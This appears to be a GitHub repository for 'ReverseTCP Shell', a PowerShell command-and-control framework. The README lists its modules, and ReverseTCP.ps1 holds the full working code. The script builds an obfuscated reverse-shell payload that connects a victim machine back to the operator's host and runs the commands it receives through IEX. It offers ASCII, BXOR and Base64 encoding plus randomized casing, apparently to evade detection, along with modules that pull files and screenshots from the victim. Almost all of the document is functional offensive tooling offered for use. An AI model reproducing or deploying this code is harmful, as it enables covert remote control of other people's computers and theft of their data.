├── README.md └── ReverseTCP.ps1 /README.md: -------------------------------------------------------------------------------- 1 | 2 | ## ReverseTCP Shell - Framework. ## 3 | 4 | ``` 5 | 6 | _____ _______ _____ _____ _____ _ _ _ _ 7 | | __ \ |__ __/ ____| __ \ / ____| | | | | | | 8 | | |__) |_____ _____ _ __ ___ ___| | | | | |__) | | (___ | |__| | ___| | | 9 | | _ // _ \ \ / / _ \ '__/ __|/ _ \ | | | | ___/ \___ \| __ |/ _ \ | | 10 | | | \ \ __/\ V / __/ | \__ \ __/ | | |____| | ____) | | | | __/ | | 11 | |_| \_\___| \_/ \___|_| |___/\___|_| \_____|_| |_____/|_| |_|\___|_|_| 12 | 13 | - By: @ZHacker13 14 | 15 | - | Modules | - Show C2-Server Modules. 16 | - | Info | - Show Remote-Host Info. 17 | - | Upload | - Upload File from Local-Host to Remote-Host. 18 | - | Download | - Download File from Remote-Host to Local-Host. 19 | - | Screenshot | - Save Screenshot from Remote-Host to Local-Host. 20 | 21 | ``` 22 | 23 | ## Tutorial: ## 24 | 25 | ### https://youtu.be/hiYyXv4RdD8 ### 26 | -------------------------------------------------------------------------------- /ReverseTCP.ps1: -------------------------------------------------------------------------------- 1 | function Character_Obfuscation($String) 2 | { 3 | $String = $String.toCharArray(); 4 | 5 | Foreach($Letter in $String) 6 | { 7 | $RandomNumber = (1..2) | Get-Random; 8 | 9 | If($RandomNumber -eq "1") 10 | { 11 | $Letter = "$Letter".ToLower(); 12 | } 13 | 14 | If($RandomNumber -eq "2") 15 | { 16 | $Letter = "$Letter".ToUpper(); 17 | } 18 | 19 | $RandomString += $Letter; 20 | $RandomNumber = $Null; 21 | } 22 | 23 | $String = $RandomString; 24 | Return $String; 25 | } 26 | 27 | function Variable_Obfuscation($String) 28 | { 29 | $RandomVariable = (0..99); 30 | 31 | For($i = 0; $i -lt $RandomVariable.count; $i++) 32 | { 33 | $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})); 34 | 35 | While($RandomVariable -like "$Temp") 36 | { 37 | $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})); 38 | } 39 | 40 | $RandomVariable[$i] = $Temp; 41 | $Temp = $Null; 42 | } 43 | 44 | $RandomString = $String; 45 | 46 | For($x = $RandomVariable.count; $x -ge 1; $x--) 47 | { 48 | $Temp = $RandomVariable[$x-1]; 49 | $RandomString = "$RandomString" -replace "\`$$x", "`$$Temp"; 50 | } 51 | 52 | $String = $RandomString; 53 | Return $String; 54 | } 55 | 56 | function ASCII_Obfuscation($String) 57 | { 58 | $PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit"; 59 | $CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit"; 60 | 61 | $String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ','; 62 | 63 | $PowerShell = Character_Obfuscation($PowerShell); 64 | $PowerShell = $PowerShell -replace "@","$String"; 65 | 66 | $CMD = Character_Obfuscation($CMD); 67 | $CMD = $CMD -replace "@","$String"; 68 | 69 | Return $PowerShell,$CMD; 70 | } 71 | 72 | function Base64_Obfuscation($String) 73 | { 74 | $PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit"; 75 | $CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit"; 76 | 77 | $Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000'); 78 | $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed})); 79 | 80 | $PowerShell = Character_Obfuscation($PowerShell); 81 | $PowerShell = $PowerShell -replace "@","$String"; 82 | $PowerShell = $PowerShell -replace "#","$Seed"; 83 | 84 | $CMD = Character_Obfuscation($CMD); 85 | $CMD = $CMD -replace "@","$String"; 86 | $CMD = $CMD -replace "#","$Seed"; 87 | 88 | Return $PowerShell,$CMD; 89 | } 90 | 91 | function BXOR_Obfuscation($String) 92 | { 93 | $PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit"; 94 | $CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit"; 95 | 96 | $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random); 97 | $String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ','; 98 | 99 | $PowerShell = Character_Obfuscation($PowerShell); 100 | $PowerShell = $PowerShell -replace "@","$String"; 101 | $PowerShell = $PowerShell -replace "#","$Key"; 102 | 103 | $CMD = Character_Obfuscation($CMD); 104 | $CMD = $CMD -replace "@","$String"; 105 | $CMD = $CMD -replace "#","$Key"; 106 | 107 | Return $PowerShell,$CMD; 108 | } 109 | 110 | function Payload($IP,$Port,$Base64_Key) 111 | { 112 | $Payload = "`$1=[System.Byte[]]::CreateInstance([System.Byte],1024);`$2=([Convert]::FromBase64String(`"@`"));`$3=`"#`";`$4=IEX([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR((`$3|ConvertTo-SecureString -Key `$2))));While(`$5=`$4.GetStream()){;While(`$5.DataAvailable -or `$6 -eq `$1.count){;`$6=`$5.Read(`$1,0,`$1.length);`$7+=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$1,0,`$6)};If(`$7){;`$8=(IEX(`$7)2>&1|Out-String);If(!(`$8.length%`$1.count)){;`$8+=`" `"};`$9=([text.encoding]::ASCII).GetBytes(`$8);`$5.Write(`$9,0,`$9.length);`$5.Flush();`$7=`$Null}}"; 113 | 114 | $Key = ([Convert]::FromBase64String($Base64_Key)); 115 | $C2 = ConvertTo-SecureString "New-Object System.Net.Sockets.TCPClient('$IP',$Port)" -AsPlainText -Force | ConvertFrom-SecureString -Key $Key; 116 | 117 | $Payload = Variable_Obfuscation(Character_Obfuscation($Payload)); 118 | $Payload = $Payload -replace "@","$Base64_Key"; 119 | $Payload = $Payload -replace "#","$C2"; 120 | 121 | Return $Payload; 122 | } 123 | 124 | $Modules = @" 125 | 126 | 127 | _____ _______ _____ _____ _____ _ _ _ _ 128 | | __ \ |__ __/ ____| __ \ / ____| | | | | | | 129 | | |__) |_____ _____ _ __ ___ ___| | | | | |__) | | (___ | |__| | ___| | | 130 | | _ // _ \ \ / / _ \ '__/ __|/ _ \ | | | | ___/ \___ \| __ |/ _ \ | | 131 | | | \ \ __/\ V / __/ | \__ \ __/ | | |____| | ____) | | | | __/ | | 132 | |_| \_\___| \_/ \___|_| |___/\___|_| \_____|_| |_____/|_| |_|\___|_|_| 133 | 134 | - By: @ZHacker13 135 | 136 | - | Modules | - Show C2-Server Modules. 137 | - | Info | - Show Remote-Host Info. 138 | - | Upload | - Upload File from Local-Host to Remote-Host. 139 | - | Download | - Download File from Remote-Host to Local-Host. 140 | - | Screenshot | - Save Screenshot from Remote-Host to Local-Host. 141 | 142 | 143 | "@; 144 | 145 | Clear-Host; 146 | Write-Host $Modules; 147 | 148 | Write-Host " - Local Host: " -NoNewline; 149 | $Local_Host = Read-Host; 150 | 151 | While(!($Local_Port)) 152 | { 153 | Write-Host " - Local Port: " -NoNewline; 154 | $Local_Port = Read-Host; 155 | 156 | netstat -na | Select-String LISTENING | % { 157 | 158 | If(($_.ToString().split(":")[1].split(" ")[0]) -eq "$Local_Port") 159 | { 160 | $Local_Port = $Null; 161 | } 162 | } 163 | } 164 | 165 | $Key = (1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 255)}); 166 | $Base64_Key = [Convert]::ToBase64String($Key); 167 | 168 | Write-Host "`n [*] Generate Payload ! [*]"; 169 | Write-Host " [*] Please Wait ... [*]"; 170 | 171 | $Payload = Payload -IP $Local_Host -Port $Local_Port -Base64_Key $Base64_Key; 172 | 173 | Write-Host " [*] Success ! [*]"; 174 | $Choices = (1..3); 175 | 176 | While(!($Choices -like "$Choice")) 177 | { 178 | Write-Host "`n [*] Obfuscation Type: [*]"; 179 | 180 | Write-Host "`n 1 = ASCII"; 181 | Write-Host " 2 = BXOR"; 182 | Write-Host " 3 = Base64"; 183 | 184 | Write-Host "`n >>> " -NoNewline; 185 | $Choice = Read-Host; 186 | } 187 | 188 | Clear-Host; 189 | Write-Host $Modules; 190 | 191 | Write-Host " - Local Host: $Local_Host"; 192 | Write-Host " - Local Port: $Local_Port"; 193 | 194 | If($Choice -eq "1") 195 | { 196 | Write-Host "`n [*] Obfuscation Type: ASCII [*]"; 197 | $Payload = ASCII_Obfuscation($Payload); 198 | } 199 | 200 | If($Choice -eq "2") 201 | { 202 | Write-Host "`n [*] Obfuscation Type: BXOR [*]"; 203 | $Payload = BXOR_Obfuscation($Payload); 204 | } 205 | 206 | If($Choice -eq "3") 207 | { 208 | Write-Host "`n [*] Obfuscation Type: Base64 [*]"; 209 | $Payload = Base64_Obfuscation($Payload); 210 | } 211 | 212 | $PowerShell_Payload = $Payload[0]; 213 | $CMD_Payload = $Payload[1]; 214 | 215 | Write-Host "`n [*] PowerShell Payload: [*]`n`n$PowerShell_Payload"; 216 | Write-Host "`n [*] CMD Payload: [*]`n`n$CMD_Payload`n"; 217 | 218 | $Bytes = [System.Byte[]]::CreateInstance([System.Byte],1024); 219 | Write-Host "`n [*] Listeneing on Port `"$Local_Port`" [*]"; 220 | $Socket = New-Object System.Net.Sockets.TcpListener('0.0.0.0',$Local_Port); 221 | $Socket.Start(); 222 | $Client = $Socket.AcceptTcpClient(); 223 | $Remote_Host = $Client.Client.RemoteEndPoint.Address.IPAddressToString; 224 | Write-Host " [*] Connection ! `"$Remote_Host`" [*]"; 225 | Write-Host " [*] Please Wait ... [*]"; 226 | $Stream = $Client.GetStream(); 227 | 228 | $WaitData = $False; 229 | $Info = $Null; 230 | 231 | $System = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Caption"); 232 | $Version = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Version"); 233 | $Architecture = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).OSArchitecture"); 234 | $Name = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).CSName"); 235 | $WindowsDirectory = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).WindowsDirectory"); 236 | 237 | $Command = "`" - Host: `"+`"$Remote_Host`"+`"``n - System: `"+$System+`"``n - Version: `"+$Version+`"``n - Architecture: `"+$Architecture+`"``n - Name: `"+$Name+`"``n - WindowsDirectory: `"+$WindowsDirectory"; 238 | 239 | While($Client.Connected) 240 | { 241 | If(!($WaitData)) 242 | { 243 | If(!($Command)) 244 | { 245 | Write-Host " - Command: " -NoNewline; 246 | $Command = Read-Host; 247 | } 248 | 249 | If($Command -eq "Modules") 250 | { 251 | Write-Host "`n$Modules"; 252 | $Command = $Null; 253 | } 254 | 255 | If($Command -eq "Info") 256 | { 257 | Write-Host "`n$Info"; 258 | $Command = $Null; 259 | } 260 | 261 | If($Command -eq "Screenshot") 262 | { 263 | $File = -join ((65..90) + (97..122) | Get-Random -Count 15 | % {[char]$_}); 264 | Write-Host "`n - Screenshot File: $File.png"; 265 | Write-Host "`n [*] Please Wait ... [*]"; 266 | $Command = "`$1=`"`$env:temp\#`";Add-Type -AssemblyName System.Windows.Forms;`$2=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);`$3=[System.Drawing.Graphics]::FromImage(`$2);`$3.CopyFromScreen((New-Object System.Drawing.Point(0,0)),(New-Object System.Drawing.Point(0,0)),`$2.Size);`$3.Dispose();`$2.Save(`"`$1`");If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ',';Remove-Item -Path `"`$1`" -Force}"; 267 | $Command = Variable_Obfuscation(Character_Obfuscation($Command)); 268 | $Command = $Command -replace "#","$File"; 269 | $File = "$pwd\$File.png"; 270 | $Save = $True; 271 | } 272 | 273 | If($Command -eq "Download") 274 | { 275 | Write-Host "`n - Download File: " -NoNewline; 276 | $File = Read-Host; 277 | 278 | If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File))) 279 | { 280 | Write-Host "`n [*] Please Wait ... [*]"; 281 | $Command = "`$1=`"#`";If(!(`"`$1`" -like `"*\*`") -and !(`"`$1`" -like `"*/*`")){`$1=`"`$pwd\`$1`"};If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ','}"; 282 | $Command = Variable_Obfuscation(Character_Obfuscation($Command)); 283 | $Command = $Command -replace "#","$File"; 284 | $File = $File.Split('\')[-1]; 285 | $File = $File.Split('/')[-1]; 286 | $File = "$pwd\$File"; 287 | $Save = $True; 288 | 289 | } Else { 290 | 291 | Write-Host "`n"; 292 | $File = $Null; 293 | $Command = $Null; 294 | } 295 | } 296 | 297 | If($Command -eq "Upload") 298 | { 299 | Write-Host "`n - Upload File: " -NoNewline; 300 | $File = Read-Host; 301 | 302 | If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File))) 303 | { 304 | Write-Host "`n [*] Please Wait ... [*]"; 305 | 306 | If(!("$File" -like "*\*") -and !("$File" -like "*/*")) 307 | { 308 | $File = "$pwd\$File"; 309 | } 310 | 311 | If(([System.IO.File]::Exists("$File"))) 312 | { 313 | $FileBytes = [io.file]::ReadAllBytes("$File") -join ','; 314 | $FileBytes = "($FileBytes)"; 315 | $File = $File.Split('\')[-1]; 316 | $File = $File.Split('/')[-1]; 317 | $Command = "`$1=`"`$pwd\#`";`$2=@;If(!([System.IO.File]::Exists(`"`$1`"))){[System.IO.File]::WriteAllBytes(`"`$1`",`$2);`"`$1 [*]`"}"; 318 | $Command = Variable_Obfuscation(Character_Obfuscation($Command)); 319 | $Command = $Command -replace "#","$File"; 320 | $Command = $Command -replace "@","$FileBytes"; 321 | $Upload = $True; 322 | 323 | } Else { 324 | 325 | Write-Host " [*] Failed ! [*]"; 326 | Write-Host " [*] File Missing [*]`n"; 327 | $Command = $Null; 328 | } 329 | 330 | } Else { 331 | 332 | Write-Host "`n"; 333 | $Command = $Null; 334 | } 335 | 336 | $File = $Null; 337 | } 338 | 339 | If(!([string]::IsNullOrEmpty($Command))) 340 | { 341 | If(!($Command.length % $Bytes.count)) 342 | { 343 | $Command += " "; 344 | } 345 | 346 | $SendByte = ([text.encoding]::ASCII).GetBytes($Command); 347 | 348 | Try { 349 | 350 | $Stream.Write($SendByte,0,$SendByte.length); 351 | $Stream.Flush(); 352 | } 353 | 354 | Catch { 355 | 356 | Write-Host "`n [*] Connection Lost ! [*]`n"; 357 | $Socket.Stop(); 358 | $Client.Close(); 359 | $Stream.Dispose(); 360 | Exit; 361 | } 362 | 363 | $WaitData = $True; 364 | } 365 | 366 | If($Command -eq "Exit") 367 | { 368 | Write-Host "`n [*] Connection Lost ! [*]`n"; 369 | $Socket.Stop(); 370 | $Client.Close(); 371 | $Stream.Dispose(); 372 | Exit; 373 | } 374 | 375 | If($Command -eq "Clear" -or $Command -eq "Cls" -or $Command -eq "Clear-Host") 376 | { 377 | Clear-Host; 378 | Write-Host "`n$Modules"; 379 | } 380 | 381 | $Command = $Null; 382 | } 383 | 384 | If($WaitData) 385 | { 386 | While(!($Stream.DataAvailable)) 387 | { 388 | Start-Sleep -Milliseconds 1; 389 | } 390 | 391 | If($Stream.DataAvailable) 392 | { 393 | While($Stream.DataAvailable -or $Read -eq $Bytes.count) 394 | { 395 | Try { 396 | 397 | If(!($Stream.DataAvailable)) 398 | { 399 | $Temp = 0; 400 | 401 | While(!($Stream.DataAvailable) -and $Temp -lt 1000) 402 | { 403 | Start-Sleep -Milliseconds 1; 404 | $Temp++; 405 | } 406 | 407 | If(!($Stream.DataAvailable)) 408 | { 409 | Write-Host "`n [*] Connection Lost ! [*]`n"; 410 | $Socket.Stop(); 411 | $Client.Close(); 412 | $Stream.Dispose(); 413 | Exit; 414 | } 415 | } 416 | 417 | $Read = $Stream.Read($Bytes,0,$Bytes.length); 418 | $OutPut += (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$Read); 419 | } 420 | 421 | Catch { 422 | 423 | Write-Host "`n [*] Connection Lost ! [*]`n"; 424 | $Socket.Stop(); 425 | $Client.Close(); 426 | $Stream.Dispose(); 427 | Exit; 428 | } 429 | } 430 | 431 | If(!($Info)) 432 | { 433 | $Info = "$OutPut"; 434 | } 435 | 436 | If($OutPut -ne " " -and !($Save) -and !($Upload)) 437 | { 438 | Write-Host "`n$OutPut"; 439 | } 440 | 441 | If($Save) 442 | { 443 | If($OutPut -ne " ") 444 | { 445 | If(!([System.IO.File]::Exists("$File"))) 446 | { 447 | $FileBytes = IEX("($OutPut)"); 448 | [System.IO.File]::WriteAllBytes("$File",$FileBytes); 449 | Write-Host " [*] Success ! [*]"; 450 | Write-Host " [*] File Saved: $File [*]`n"; 451 | 452 | } Else { 453 | 454 | Write-Host " [*] Failed ! [*]"; 455 | Write-Host " [*] File already Exists [*]`n"; 456 | } 457 | } Else { 458 | 459 | Write-Host " [*] Failed ! [*]"; 460 | Write-Host " [*] File Missing [*]`n"; 461 | } 462 | 463 | $File = $Null; 464 | $Save = $False; 465 | } 466 | 467 | If($Upload) 468 | { 469 | If($OutPut -ne " ") 470 | { 471 | $OutPut = $OutPut -replace "`n",""; 472 | Write-Host " [*] Success ! [*]"; 473 | Write-Host " [*] File Uploaded: $OutPut`n"; 474 | 475 | } Else { 476 | 477 | Write-Host " [*] Failed ! [*]"; 478 | Write-Host " [*] File already Exists [*]`n"; 479 | } 480 | 481 | $Upload = $False; 482 | } 483 | 484 | $WaitData = $False; 485 | $Read = $Null; 486 | $OutPut = $Null; 487 | } 488 | } 489 | } 490 | --------------------------------------------------------------------------------